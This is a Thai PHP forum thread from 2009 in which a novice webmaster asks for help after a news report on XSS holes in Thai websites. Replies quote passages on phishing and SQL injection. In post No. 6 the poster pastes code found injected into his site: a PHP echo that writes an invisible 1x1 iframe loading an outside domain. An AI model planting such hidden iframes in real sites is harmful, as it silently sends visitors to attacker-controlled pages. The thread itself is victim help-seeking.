Register Register Member Login Member Login Member Login Forgot Password ??
PHP , ASP , ASP.NET, VB.NET, C#, Java , jQuery , Android , iOS , Windows Phone
 

Registered : 109,030

HOME > PHP > PHP Forum > ไม่แน่ใจว่ามือใหม่อ่านยัง ( แฮกเกอร์ ) เครียจเลย เว็บไซต์ในประเทศไทยที่พบช่องโหว่ ชนิดเอ็กซ์เอสเอส



 

ไม่แน่ใจว่ามือใหม่อ่านยัง ( แฮกเกอร์ ) เครียจเลย เว็บไซต์ในประเทศไทยที่พบช่องโหว่ ชนิดเอ็กซ์เอสเอส

 



Topic : 027129



โพสกระทู้ ( 302 )
บทความ ( 0 )



สถานะออฟไลน์




เว็บไซต์ในประเทศไทยที่พบช่องโหว่ ชนิดเอ็กซ์เอสเอส (XSS) หรือครอส ไซต์ สคริปติ้ง (Cross Site Scripting) ซึ่งมีโอกาสสูงที่จะถูกฝังโค้ดจาก ?นักโจมตีนอกระบบ? หรือแฮกเกอร์ ถึง 41 เว็บไซต์ ในหลายกลุ่มองค์กร


http://news.impaqmsn.com/articles_hn.aspx?id=262203&ch=hn

มือใหม่เสียด้วย กำลังโดน แฮกเกอร์ ไม่รู้ทำไงดี ขอคำนำหน่อยครับ
ขอบคุณล่วงหน้าครับ



Tag : - - - -






Move To Hilight (Stock) 
Send To Friend.Bookmark.
Date : 2009-05-07 16:12:25 By : pun05 View : 1479 Reply : 8
 

 

No. 1



โพสกระทู้ ( 33 )
บทความ ( 0 )



สถานะออฟไลน์








Date : 2009-05-07 16:31:05 By : petro152
 


 

No. 2



โพสกระทู้ ( 2,794 )
บทความ ( 0 )

สมาชิกที่ใส่เสื้อไทยครีเอท

สถานะออฟไลน์



Date : 2009-05-07 16:33:37 By : panyapol
 

 

No. 3



โพสกระทู้ ( 4 )
บทความ ( 0 )



สถานะออฟไลน์



Date : 2009-05-07 19:44:25 By : diw07023
 


 

No. 4



โพสกระทู้ ( 302 )
บทความ ( 0 )



สถานะออฟไลน์


งง ไม่ได้ช่วยอะไรเลย
Date : 2009-05-07 19:56:47 By : pun05
 


 

No. 5



โพสกระทู้ ( 913 )
บทความ ( 2 )



สถานะออฟไลน์
Facebook

Quote:
หลอกให้ผู้ใช้กรอกข้อมูลสำคัญแล้วส่งกลับไปให้แฮกเกอร์ แทนที่จะผ่านเข้าไปในเว็บไซต์ที่ต้องการ เช่น หลอกว่าเป็นเว็บไซต์ธนาคารโดยหลอกว่าธนาคารกำลังมีการปรับปรุงข้อมูลจึงขอให้คลิกลิงก์เข้าสู่เว็บไซต์ลวงของแฮกเกอร์ เพื่อให้ผู้ใช้กรอกข้อมูลบัตรเครดิต หรืออื่น ๆ เป็นต้น


Quote:
นอกจากนี้ ยังมีเทคนิค เอสคิวแอล อินเจ็กชั่น (SQL Injection) แฮกเกอร์จะใช้ช่องโหว่ของโปรแกรมทำการใส่คำสั่งภาษาเอสคิวแอลเข้าไปทางส่วนรับข้อมูล เช่น ?เท็กซ์ บ็อกซ์? ที่ให้ใส่ ?ยูสเซอร์เนม? และ ?พาสเวิร์ด? ก่อนเข้าสู่เว็บไซต์ โดยแฮกเกอร์จะใส่คำสั่งลงในส่วนที่มีช่องโหว่เพื่อ ?โจมตี? รูปแบบต่าง ๆ ต่อฐานข้อมูล ไม่ว่าจะเป็นการ อ่านข้อมูลที่สำคัญ แก้ไขข้อมูล, ลบข้อมูลที่อยู่ในฐานข้อมูล ดังกล่าว


คุณได้ทำตามเค้ารึป่าวหละครับ ถ้าไม่ทำตามก็อย่าไปกลัวครับทางที่ดี backup รายสัปดาห์มันเป็นช่องโหว่ เล็กๆน้อย แต่อาจจะมองข้าม
Date : 2009-05-08 10:35:29 By : teez1232002
 


 

No. 6



โพสกระทู้ ( 302 )
บทความ ( 0 )



สถานะออฟไลน์


ขอบคุณมากครับ
ของผมเป็นลักษณะการฝัง code ดูๆ ไปมันเหมือนจะเป็นการส่งค่าอะไรบางอย่างไปอีกเว็บนึ่ง
มันคงเล่นสนุกๆมั่งครับ เพราะเว็บไม่มีอะไรสำคัญมาก
ในลักษณะนี้ไม่แน่ใจว่าเป็นการโจมตีของ แฮกเกอร์ หรือเปล่า

code นี้เลยครับ ที่เคยตั้งกระทู้ไปแล้วแต่ยังสงสัย

Code (PHP)
echo "<iframe src=\"http://vafuiek.com/?click=4396CB\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";


ผมก็ cmode folder แล้ว บางที่ไฟล์ index หาเฉยเลย งง มากครับ
Date : 2009-05-09 08:54:17 By : pun05
 


 

No. 7



โพสกระทู้ ( 74,058 )
บทความ ( 838 )

สมาชิกที่ใส่เสื้อไทยครีเอท

สถานะออฟไลน์
Twitter Facebook

Quote:
หลอกให้ผู้ใช้กรอกข้อมูลสำคัญแล้วส่งกลับไปให้แฮกเกอร์ แทนที่จะผ่านเข้าไปในเว็บไซต์ที่ต้องการ เช่น หลอกว่าเป็นเว็บไซต์ธนาคารโดยหลอกว่าธนาคารกำลังมีการปรับปรุงข้อมูลจึงขอ ให้คลิกลิงก์เข้าสู่เว็บไซต์ลวงของแฮกเกอร์ เพื่อให้ผู้ใช้กรอกข้อมูลบัตรเครดิต หรืออื่น ๆ เป็นต้น


อันนี้น่ากลัวมาก ๆ
Date : 2009-05-09 09:26:28 By : webmaster
 


 

No. 8



โพสกระทู้ ( 11,835 )
บทความ ( 10 )

สมาชิกที่ใส่เสื้อไทยครีเอท Hall of Fame 2012

สถานะออฟไลน์


Code
หลอกให้ผู้ใช้กรอกข้อมูลสำคัญแล้วส่งกลับไปให้แฮกเกอร์ แทนที่จะผ่านเข้าไปในเว็บไซต์ที่ต้องการ เช่น หลอกว่าเป็นเว็บไซต์ธนาคารโดยหลอกว่าธนาคารกำลังมีการปรับปรุงข้อมูลจึงขอ ให้คลิกลิงก์เข้าสู่เว็บไซต์ลวงของแฮกเกอร์ เพื่อให้ผู้ใช้กรอกข้อมูลบัตรเครดิต หรืออื่น ๆ เป็นต้น

เขาเรียก fishing คงเห็นว่าเราเป็นปลาข่อ
Date : 2009-05-09 21:26:24 By : plakrim
 

   

ค้นหาข้อมูล
   
 

แสดงความคิดเห็น
Re : ไม่แน่ใจว่ามือใหม่อ่านยัง ( แฮกเกอร์ ) เครียจเลย เว็บไซต์ในประเทศไทยที่พบช่องโหว่ ชนิดเอ็กซ์เอสเอส
 
 
รายละเอียด
 
ตัวหนา ตัวเอียง ตัวขีดเส้นใต้ ตัวมีขีดกลาง| ตัวเรืองแสง ตัวมีเงา ตัวอักษรวิ่ง| จัดย่อหน้าอิสระ จัดย่อหน้าชิดซ้าย จัดย่อหน้ากึ่งกลาง จัดย่อหน้าชิดขวา| เส้นขวาง| ขนาดตัวอักษร แบบตัวอักษร
ใส่แฟลช ใส่รูป ใส่ไฮเปอร์ลิ้งค์ ใส่อีเมล์ ใส่ลิ้งค์ FTP| ใส่แถวของตาราง ใส่คอลัมน์ตาราง| ตัวยก ตัวห้อย ตัวพิมพ์ดีด| ใส่โค้ด ใส่การอ้างถึงคำพูด| ใส่ลีสต์
smiley for :lol: smiley for :ken: smiley for :D smiley for :) smiley for ;) smiley for :eek: smiley for :geek: smiley for :roll: smiley for :erm: smiley for :cool: smiley for :blank: smiley for :idea: smiley for :ehh: smiley for :aargh: smiley for :evil:
Insert PHP Code
Insert ASP Code
 Insert VB.NET Code Insert C#.NET Code Insert JavaScript Code Insert C#.NET Code
Insert Java Code
Insert Android Code
Insert Objective-C Code
Insert XML Code
Insert SQL Code
Insert Code
เพื่อความเรียบร้อยของข้อความ ควรจัดรูปแบบให้พอดีกับขนาดของหน้าจอ เพื่อง่ายต่อการอ่านและสบายตา และตรวจสอบภาษาไทยให้ถูกต้อง

อัพโหลดแทรกรูปภาพ

Notice

เพื่อความปลอดภัยของเว็บบอร์ด ไม่อนุญาติให้แทรก แท็ก [img]....[/img] โดยการอัพโหลดไฟล์รูปจากที่อื่น เช่นเว็บไซต์ ฟรีอัพโหลดต่าง ๆ
อัพโหลดแทรกรูปภาพ ให้ใช้บริการอัพโหลดไฟล์ของไทยครีเอท และตัดรูปภาพให้พอดีกับสกรีน เพื่อความโหลดเร็วและไฟล์ไม่ถูกลบทิ้ง

   
  เพื่อความปลอดภัยและการตรวจสอบ กระทู้ที่แทรกไฟล์อัพโหลดไฟล์จากที่อื่น อาจจะถูกลบทิ้ง
 
โดย
อีเมล์
บวกค่าให้ถูก
<= ตัวเลขฮินดูอารบิก เช่น 123 (หรือล็อกอินเข้าระบบสมาชิกเพื่อไม่ต้องกรอก)







Exchange: นำเข้าสินค้าจากจีน, Taobao, เฟอร์นิเจอร์, ของพรีเมี่ยม, ร่ม, ปากกา, power bank, แฟลชไดร์ฟ, กระบอกน้ำ

Load balance : Server 05
ThaiCreate.Com Logo
© www.ThaiCreate.Com. 2003-2024 All Rights Reserved.
ไทยครีเอทบริการ จัดทำดูแลแก้ไข Web Application ทุกรูปแบบ (PHP, .Net Application, VB.Net, C#)
[Conditions Privacy Statement] ติดต่อโฆษณา 081-987-6107 อัตราราคา คลิกที่นี่